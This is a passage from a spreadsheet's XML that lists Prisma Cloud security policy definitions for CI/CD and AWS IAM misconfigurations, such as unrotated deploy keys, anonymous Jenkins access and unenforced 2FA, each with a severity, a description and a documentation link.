      <c r="O1027" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1027" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1027" t="inlineStr"/>
      <c r="R1027" t="inlineStr"/>
      <c r="S1027" t="inlineStr"/>
      <c r="T1027" t="b">
        <v>0</v>
      </c>
      <c r="U1027" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1027" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1027" t="inlineStr">
        <is>
          <t>Repository access keys created with weak signature algorithms can allow attackers to perform a Man In The Middle attack and compromise the integrity and confidentiality of the communications with the SCM. An access key created with the deprecated ssh-dss algorithm is in use in the Bitbucket workspace. The algorithm was deprecated in OpenSSH 7.0: http://www.openssh.com/legacy.html</t>
        </is>
      </c>
      <c r="X1027" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-deploykey-weak-ssh</t>
        </is>
      </c>
      <c r="Y1027" t="inlineStr"/>
      <c r="Z1027" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1027" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1027" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1027" t="inlineStr"/>
      <c r="AD1027" t="b">
        <v>1</v>
      </c>
      <c r="AE1027" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1027" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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7" t="inlineStr">
        <is>
          <t>8ed1dc72-a741-4157-be1d-7e5d426c5d61</t>
        </is>
      </c>
      <c r="AI1027" t="inlineStr"/>
      <c r="AJ1027" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1027" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1028">
      <c r="A1028" t="inlineStr"/>
      <c r="B1028" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1028" s="2" t="inlineStr"/>
      <c r="D1028" t="inlineStr"/>
      <c r="E1028" t="inlineStr"/>
      <c r="F1028" t="inlineStr"/>
      <c r="G1028" t="b">
        <v>1</v>
      </c>
      <c r="H10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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1028" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1028" t="inlineStr">
        <is>
          <t>Unrotated GitHub deploy keys</t>
        </is>
      </c>
      <c r="L1028" t="inlineStr"/>
      <c r="M1028" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1028" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1028" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1028" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1028" t="inlineStr"/>
      <c r="R1028" t="inlineStr"/>
      <c r="S1028" t="inlineStr"/>
      <c r="T1028" t="b">
        <v>0</v>
      </c>
      <c r="U1028" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1028" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1028" t="inlineStr">
        <is>
          <t>Deploy keys created on GitHub projects were not rotated for more than 180 days. An attacker that obtains access to a deploy key has direct access to the repository code, and in cases where the key is assigned with write permissions, it grants the ability to edit it. As long as a deploy key exists, it increases the potential of a leaked key to be valid when used by an attacker.</t>
        </is>
      </c>
      <c r="X1028" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-unrotated-dep-key</t>
        </is>
      </c>
      <c r="Y1028" t="inlineStr"/>
      <c r="Z1028" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1028" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1028" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1028" t="inlineStr"/>
      <c r="AD1028" t="b">
        <v>1</v>
      </c>
      <c r="AE1028" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1028" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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8" t="inlineStr">
        <is>
          <t>aa752dd5-6f92-41b5-9313-ac82e2b05590</t>
        </is>
      </c>
      <c r="AI1028" t="inlineStr"/>
      <c r="AJ1028" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1028" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1029">
      <c r="A1029" t="inlineStr"/>
      <c r="B1029" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1029" s="2" t="inlineStr"/>
      <c r="D1029" t="inlineStr"/>
      <c r="E1029" t="inlineStr"/>
      <c r="F1029" t="inlineStr"/>
      <c r="G1029" t="b">
        <v>1</v>
      </c>
      <c r="H10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29" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1029" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1029" t="inlineStr">
        <is>
          <t>Jenkins provides full access to anonymous visitors</t>
        </is>
      </c>
      <c r="L1029" t="inlineStr"/>
      <c r="M1029" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1029" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1029" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1029" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1029" t="inlineStr"/>
      <c r="R1029" t="inlineStr"/>
      <c r="S1029" t="inlineStr"/>
      <c r="T1029" t="b">
        <v>0</v>
      </c>
      <c r="U1029" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1029" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1029" t="inlineStr">
        <is>
          <t>Jenkins is configured to allow full access to anonymous visitors. Any visitor with network access to the system is granted with full administrative permissions, providing abilities as accessing secrets, creating, modifying and deleting pipelines, and managing user accounts. This permission model puts the system at risk, as any attacker that achieves access to the system automatically controls every part of it.</t>
        </is>
      </c>
      <c r="X1029" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-fullaccess-anon-visitors</t>
        </is>
      </c>
      <c r="Y1029" t="inlineStr"/>
      <c r="Z1029" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1029" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1029" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1029" t="inlineStr"/>
      <c r="AD1029" t="b">
        <v>1</v>
      </c>
      <c r="AE1029" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1029" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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29" t="inlineStr">
        <is>
          <t>438fd059-92ae-42dd-ac9c-fafab6229858</t>
        </is>
      </c>
      <c r="AI1029" t="inlineStr"/>
      <c r="AJ1029" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1029" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1030">
      <c r="A1030" t="inlineStr"/>
      <c r="B1030" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1030" s="2" t="inlineStr"/>
      <c r="D1030" t="inlineStr"/>
      <c r="E1030" t="inlineStr"/>
      <c r="F1030" t="inlineStr"/>
      <c r="G1030" t="b">
        <v>1</v>
      </c>
      <c r="H10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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1030" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1030" t="inlineStr">
        <is>
          <t>Inactive GitLab user accounts</t>
        </is>
      </c>
      <c r="L1030" t="inlineStr"/>
      <c r="M1030" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1030" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1030" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1030" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1030" t="inlineStr"/>
      <c r="R1030" t="inlineStr"/>
      <c r="S1030" t="inlineStr"/>
      <c r="T1030" t="b">
        <v>0</v>
      </c>
      <c r="U1030" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1030" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1030" t="inlineStr">
        <is>
          <t>A GitLab user account has not been in use for a period of more than 30 days. Therefore, it may be leveraged by an adversary that has compromised the account to gain access to sensitive resources, and to manipulate critical data and processes.</t>
        </is>
      </c>
      <c r="X1030" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-inactive-user-acc</t>
        </is>
      </c>
      <c r="Y1030" t="inlineStr"/>
      <c r="Z1030" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1030" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1030" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1030" t="inlineStr"/>
      <c r="AD1030" t="b">
        <v>1</v>
      </c>
      <c r="AE1030" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1030" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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0" t="inlineStr">
        <is>
          <t>cce92086-a940-435f-a220-9f68f88f10a9</t>
        </is>
      </c>
      <c r="AI1030" t="inlineStr"/>
      <c r="AJ1030" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1030" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1031">
      <c r="A1031" t="inlineStr"/>
      <c r="B1031" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1031" s="2" t="inlineStr"/>
      <c r="D1031" t="inlineStr"/>
      <c r="E1031" t="inlineStr"/>
      <c r="F1031" t="inlineStr"/>
      <c r="G1031" t="b">
        <v>1</v>
      </c>
      <c r="H10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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1031" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1031" t="inlineStr">
        <is>
          <t>Weak authentication service in use in Jenkins</t>
        </is>
      </c>
      <c r="L1031" t="inlineStr"/>
      <c r="M1031" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1031" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1031" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1031" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1031" t="inlineStr"/>
      <c r="R1031" t="inlineStr"/>
      <c r="S1031" t="inlineStr"/>
      <c r="T1031" t="b">
        <v>0</v>
      </c>
      <c r="U1031" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1031" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1031" t="inlineStr">
        <is>
          <t>Jenkins provides built-in methods for authentication of users, such as a Jenkins' own user database, or a Unix user/group database. These methods lack basic security controls which are essential to assure the immunity of the system, such as enforcing a password policy, controls against Brute Force attacks, and requiring 2FA. These weak authentication methods might expose the organization to a wide variety of authentication-based attacks.</t>
        </is>
      </c>
      <c r="X1031" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-weak-auth-service</t>
        </is>
      </c>
      <c r="Y1031" t="inlineStr"/>
      <c r="Z1031" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1031" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1031" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1031" t="inlineStr"/>
      <c r="AD1031" t="b">
        <v>1</v>
      </c>
      <c r="AE1031" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1031" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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1" t="inlineStr">
        <is>
          <t>5dcaa867-09ea-4e42-aab5-42886cd7713a</t>
        </is>
      </c>
      <c r="AI1031" t="inlineStr"/>
      <c r="AJ1031" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1031" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1032">
      <c r="A1032" t="inlineStr"/>
      <c r="B1032" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1032" s="2" t="inlineStr"/>
      <c r="D1032" t="inlineStr"/>
      <c r="E1032" t="inlineStr"/>
      <c r="F1032" t="inlineStr"/>
      <c r="G1032" t="b">
        <v>1</v>
      </c>
      <c r="H10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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1032" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1032" t="inlineStr">
        <is>
          <t>Default branch does not require signed commits in GitHub</t>
        </is>
      </c>
      <c r="L1032" t="inlineStr"/>
      <c r="M1032" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1032" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1032" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1032" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1032" t="inlineStr"/>
      <c r="R1032" t="inlineStr"/>
      <c r="S1032" t="inlineStr"/>
      <c r="T1032" t="b">
        <v>0</v>
      </c>
      <c r="U1032" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1032" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1032" t="inlineStr">
        <is>
          <t>Unsigned commits in GitHub present significant risks, including compromising code integrity and introducing uncertainty regarding authorship. If an attacker gains unauthorized access to a developer's account, they could impersonate the developer and make malicious code commits undetected. The absence of signed commits makes it exceedingly difficult to distinguish between fraudulent and legitimate commits.</t>
        </is>
      </c>
      <c r="X1032" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-defaultbranch-doesnt-require-signed-commits</t>
        </is>
      </c>
      <c r="Y1032" t="inlineStr"/>
      <c r="Z1032" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1032" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1032" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1032" t="inlineStr"/>
      <c r="AD1032" t="b">
        <v>1</v>
      </c>
      <c r="AE1032" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1032" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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2" t="inlineStr">
        <is>
          <t>36e13064-e6d6-44ba-bed9-e55843504a91</t>
        </is>
      </c>
      <c r="AI1032" t="inlineStr"/>
      <c r="AJ1032" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1032" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1033">
      <c r="A1033" t="inlineStr"/>
      <c r="B1033" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1033" s="2" t="inlineStr"/>
      <c r="D1033" t="inlineStr"/>
      <c r="E1033" t="inlineStr"/>
      <c r="F1033" t="inlineStr"/>
      <c r="G1033" t="b">
        <v>1</v>
      </c>
      <c r="H10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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1033" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1033" t="inlineStr">
        <is>
          <t>Unrotated BitBucket access keys</t>
        </is>
      </c>
      <c r="L1033" t="inlineStr"/>
      <c r="M1033" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1033" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1033" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1033" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1033" t="inlineStr"/>
      <c r="R1033" t="inlineStr"/>
      <c r="S1033" t="inlineStr"/>
      <c r="T1033" t="b">
        <v>0</v>
      </c>
      <c r="U1033" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1033" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1033" t="inlineStr">
        <is>
          <t>Access keys created on BitBucket projects were not rotated for more than 180 days. An attacker that obtains access to an access key has direct access to the repository code, and in cases where the key is assigned with write permissions, it grants the ability to edit it. As long as a deploy key exists, it increases the potential of a leaked key to be valid when used by an attacker.</t>
        </is>
      </c>
      <c r="X1033" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-unrotate-accesskey</t>
        </is>
      </c>
      <c r="Y1033" t="inlineStr"/>
      <c r="Z1033" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1033" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1033" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1033" t="inlineStr"/>
      <c r="AD1033" t="b">
        <v>1</v>
      </c>
      <c r="AE1033" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1033" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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3" t="inlineStr">
        <is>
          <t>360072e1-e00e-4266-8807-348a4e3ad6d0</t>
        </is>
      </c>
      <c r="AI1033" t="inlineStr"/>
      <c r="AJ1033" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1033" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1034">
      <c r="A1034" t="inlineStr"/>
      <c r="B1034" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1034" s="2" t="inlineStr"/>
      <c r="D1034" t="inlineStr"/>
      <c r="E1034" t="inlineStr"/>
      <c r="F1034" t="inlineStr"/>
      <c r="G1034" t="b">
        <v>1</v>
      </c>
      <c r="H10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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1034" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="K1034" t="inlineStr">
        <is>
          <t>2FA is not enforced in GitHub</t>
        </is>
      </c>
      <c r="L1034" t="inlineStr"/>
      <c r="M1034" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1034" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1034" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1034" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1034" t="inlineStr"/>
      <c r="R1034" t="inlineStr"/>
      <c r="S1034" t="inlineStr"/>
      <c r="T1034" t="b">
        <v>0</v>
      </c>
      <c r="U1034" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1034" t="inlineStr">
        <is>
          <t>IaC:IAM:</t>
        </is>
      </c>
      <c r="W1034" t="inlineStr">
        <is>
          <t>Two-factor authentication (2FA) is an extra layer of security, used when logging into websites or apps. In case a set of credentials to the system is compromised, an adversary will not be able to use the credentials without the second factor. Currently, 2FA is not enforced for all users, so that enabling 2FA is up to the discretion of each individual account user.</t>
        </is>
      </c>
      <c r="X1034" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-multi-factor-not-enforced</t>
        </is>
      </c>
      <c r="Y1034" t="inlineStr"/>
      <c r="Z1034" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1034" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1034" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1034" t="inlineStr"/>
      <c r="AD1034" t="b">
        <v>1</v>
      </c>
      <c r="AE1034" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1034" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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4" t="inlineStr">
        <is>
          <t>af653e16-6742-4076-ada4-13c1d165e78e</t>
        </is>
      </c>
      <c r="AI1034" t="inlineStr"/>
      <c r="AJ1034" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1034" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1035">
      <c r="A1035" t="inlineStr"/>
      <c r="B1035" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1035" s="2" t="inlineStr"/>
      <c r="D1035" t="inlineStr"/>
      <c r="E1035" t="inlineStr"/>
      <c r="F1035" t="inlineStr"/>
      <c r="G1035" t="b">
        <v>1</v>
      </c>
      <c r="H10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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1035" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-apigatewayv2</t>
        </is>
      </c>
      <c r="K1035" t="inlineStr">
        <is>
          <t>Authorization type for API GatewayV2 routes is not specified</t>
        </is>
      </c>
      <c r="L1035" t="inlineStr"/>
      <c r="M1035" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1035" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1035" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1035" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1035" t="inlineStr"/>
      <c r="R1035" t="inlineStr"/>
      <c r="S1035" t="inlineStr"/>
      <c r="T1035" t="b">
        <v>0</v>
      </c>
      <c r="U1035" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1035" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-apigatewayv2-route</t>
        </is>
      </c>
      <c r="W1035" t="inlineStr">
        <is>
          <t>Ensure API GatewayV2 routes specify an authorization type</t>
        </is>
      </c>
      <c r="X1035" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-309</t>
        </is>
      </c>
      <c r="Y1035" t="inlineStr"/>
      <c r="Z1035" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_apigatewayv2_route"]}</t>
        </is>
      </c>
      <c r="AA1035" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1035" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1035" t="inlineStr">
        <is>
          <t>CKV_AWS_309</t>
        </is>
      </c>
      <c r="AD1035" t="b">
        <v>1</v>
      </c>
      <c r="AE1035" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1035" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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5" t="inlineStr">
        <is>
          <t>4df8cbf6-b9c2-479e-a0c3-01e26116cd40</t>
        </is>
      </c>
      <c r="AI1035" t="inlineStr"/>
      <c r="AJ1035" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1035" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1036">
      <c r="A1036" t="inlineStr"/>
      <c r="B1036" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1036" s="2" t="inlineStr"/>
      <c r="D1036" t="inlineStr"/>
      <c r="E1036" t="inlineStr"/>
      <c r="F1036" t="inlineStr"/>
      <c r="G1036" t="b">
        <v>1</v>
      </c>
      <c r="H10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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1036" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-db</t>
        </is>
      </c>
      <c r="K1036" t="inlineStr">
        <is>
          <t>RDS database does not have IAM authentication enabled</t>
        </is>
      </c>
      <c r="L1036" t="inlineStr"/>
      <c r="M1036" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1036" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1036" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1036" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1036" t="inlineStr"/>
      <c r="R1036" t="inlineStr"/>
      <c r="S1036" t="inlineStr">
        <is>
          <t>ruben_checkov_2</t>
        </is>
      </c>
      <c r="T1036" t="b">
        <v>0</v>
      </c>
      <c r="U1036" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1036" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-db-instance</t>
        </is>
      </c>
      <c r="W1036" t="inlineStr">
        <is>
          <t>Ensure RDS database has IAM authentication enabled</t>
        </is>
      </c>
      <c r="X1036" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-rds-database-has-iam-authentication-enabled</t>
        </is>
      </c>
      <c r="Y1036" t="inlineStr"/>
      <c r="Z1036" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_db_instance"]}</t>
        </is>
      </c>
      <c r="AA1036" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1036" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1036" t="inlineStr">
        <is>
          <t>CKV_AWS_161</t>
        </is>
      </c>
      <c r="AD1036" t="b">
        <v>1</v>
      </c>
      <c r="AE1036" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1036" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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6" t="inlineStr">
        <is>
          <t>174e5082-331c-4cb7-9643-0d53e96a485f</t>
        </is>
      </c>
      <c r="AI1036" t="inlineStr"/>
      <c r="AJ1036" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1036" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1037">
      <c r="A1037" t="inlineStr"/>
      <c r="B1037" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1037" s="2" t="inlineStr"/>
      <c r="D1037" t="inlineStr"/>
      <c r="E1037" t="inlineStr"/>
      <c r="F1037" t="inlineStr"/>
      <c r="G1037" t="b">
        <v>1</v>
      </c>
      <c r="H10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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1037" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-db</t>
        </is>
      </c>
      <c r="K1037" t="inlineStr">
        <is>
